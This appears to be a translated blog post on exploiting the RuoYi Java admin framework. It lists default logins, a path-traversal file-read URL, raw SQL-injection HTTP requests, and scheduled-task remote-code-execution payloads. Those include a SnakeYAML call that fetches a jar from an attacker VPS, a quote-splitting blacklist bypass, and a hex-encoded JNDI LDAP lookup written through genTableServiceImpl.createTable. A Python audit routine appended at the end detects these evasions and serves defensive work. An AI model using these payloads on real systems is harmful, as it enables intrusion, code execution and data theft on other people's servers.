RuoYi vulnerability exploitation

1. RuoYi default credentials

admin/admin123

ruoyi/123456

2. Front-end Shiro deserialization

The version is too old to be practically exploitable; the use of deserialization tooling is not covered further here.

3. Arbitrary file read, RuoYi < 4.5.1

GET /common/download/resource?resource=/profile/../../../../../../../(unknown)

4. SQL injection

4-1. The /system/role/list path

POST variant

POST /system/role/list HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Content-Length: 181  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/system/role  
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))  

GET variant

GET /system/role/list?pageSize=10&pageNum=1&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=&params%5BdataScope%5D=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))   HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Content-Length: 181  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/system/role  
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  

4-2. The /system/dept/list path

POST /system/dept/list HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Connection: keep-alive
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Cookie: 
sec-ch-ua-mobile: ?0
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Length: 0

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

5. Scheduled tasks

5-1. Unrestricted scheduled-task abuse

After staging the exploit payload on a VPS, create a new task in the scheduled-task module:

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps地址/yaml-payload.jar"]]]]')

0/10 * * * * ?

5-2. Blacklist restricting the invoke string

Scheduled tasks block ldap remote calls.

Scheduled tasks block http(s) remote calls.

Scheduled tasks block rmi remote calls.

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["h't't'p'://vps地址/yaml-payload.jar"]]]]')

0/10 * * * * ?

5-3. Invoke-class whitelist restriction

Use the genTableServiceImpl.createTable method to change invoke_target to a JNDI payload.

Exploitation method:

Create a new scheduled task:

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'NILF' WHERE job_id = 1;')

0/10 * * * * ?

If the task with job_id 1 now shows NILF as its "invoke target string", the vulnerability is present and can be exploited further. The actual attack payload is:

genTableServiceImpl.createTable("UPDATE sys_job SET invoke_target = \"javax.naming.InitialContext.lookup('ldap://ip:端口/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')\" WHERE job_id = 1;")

JNDI is usually disabled, however, so the value (javax.naming.InitialContext.lookup('ldap://ip:端口/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')) is converted to hexadecimal to get past the blacklist. The final payload is:

genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f3139322e3136382e34342e38343a313338392f446573657269616c697a6174696f6e2f55524c444e532f656b777a6d787479696d2e64677268332e636e2729 WHERE job_id = 1;')
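Defensive counterpart, added here and not part of the original post or of RuoYi's own code: an audit routine for sys_job.invoke_target values that undoes the two evasions shown in section 5 (quote-splitting of the URL scheme, and a hex-encoded value written through genTableServiceImpl.createTable) before checking the bean allowlist and the remote-call blocklist. The bean names in BEAN_ALLOWLIST and the rejection of any SQL that touches sys_job are assumptions of this example.

```python
import re

# Added example (not RuoYi's code): audit sys_job.invoke_target values as a
# defender would, undoing the two evasions shown in section 5 before matching.
# The bean names in BEAN_ALLOWLIST are assumed for this example.
BLOCKED_SCHEMES = ("ldap://", "http://", "https://", "rmi://")
BLOCKED_TOKENS = ("org.yaml.snakeyaml", "javax.naming",
                  "ScriptEngineManager", "URLClassLoader")
BEAN_ALLOWLIST = {"ryTask", "genTableServiceImpl"}  # assumed allowlist
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
SYS_JOB_WRITE = re.compile(r"\b(update|insert|delete)\b[^;]*\bsys_job\b")


def normalize_target(target: str) -> str:
    """Return the text to match against, with the page's evasions undone:
    SQL hex literals (0x6a61...) are decoded so the string an UPDATE would
    write into sys_job is inspected, and straight or curly single quotes
    are dropped so h't't'p' collapses back to http."""
    def decode(m):
        try:
            return bytes.fromhex(m.group(1)).decode("utf-8")
        except ValueError:  # odd length or not valid UTF-8: leave as-is
            return m.group(0)
    decoded = HEX_LITERAL.sub(decode, target)
    return re.sub(r"['\u2018\u2019]", "", decoded)


def audit_invoke_target(target: str) -> list:
    """Reasons to reject an invoke_target; an empty list means it passed.
    Run this when a job is saved and again when it fires, because the
    section 5-3 chain rewrites invoke_target after the save-time check."""
    reasons = []
    norm = normalize_target(target)
    low = norm.lower()
    bean = norm.split(".", 1)[0].split("(", 1)[0]  # bean name before the first '.'
    if bean not in BEAN_ALLOWLIST:
        reasons.append(f"bean '{bean}' not in allowlist")
    for scheme in BLOCKED_SCHEMES:
        if scheme in low:
            reasons.append(f"remote call scheme {scheme}")
    for token in BLOCKED_TOKENS:
        if token.lower() in low:
            reasons.append(f"blocked token {token}")
    # An allowlisted bean handed SQL can still rewrite the job table itself,
    # so any statement touching sys_job is rejected outright.
    if SYS_JOB_WRITE.search(low):
        reasons.append("SQL write against sys_job")
    return reasons
```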

 



Posted by 旬常